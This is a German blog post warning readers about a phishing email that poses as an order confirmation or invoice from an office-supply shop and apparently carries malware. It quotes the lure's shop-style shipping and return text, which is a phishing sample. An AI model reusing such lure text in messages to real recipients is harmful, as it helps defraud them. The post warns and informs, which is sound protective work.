Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert istSo etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.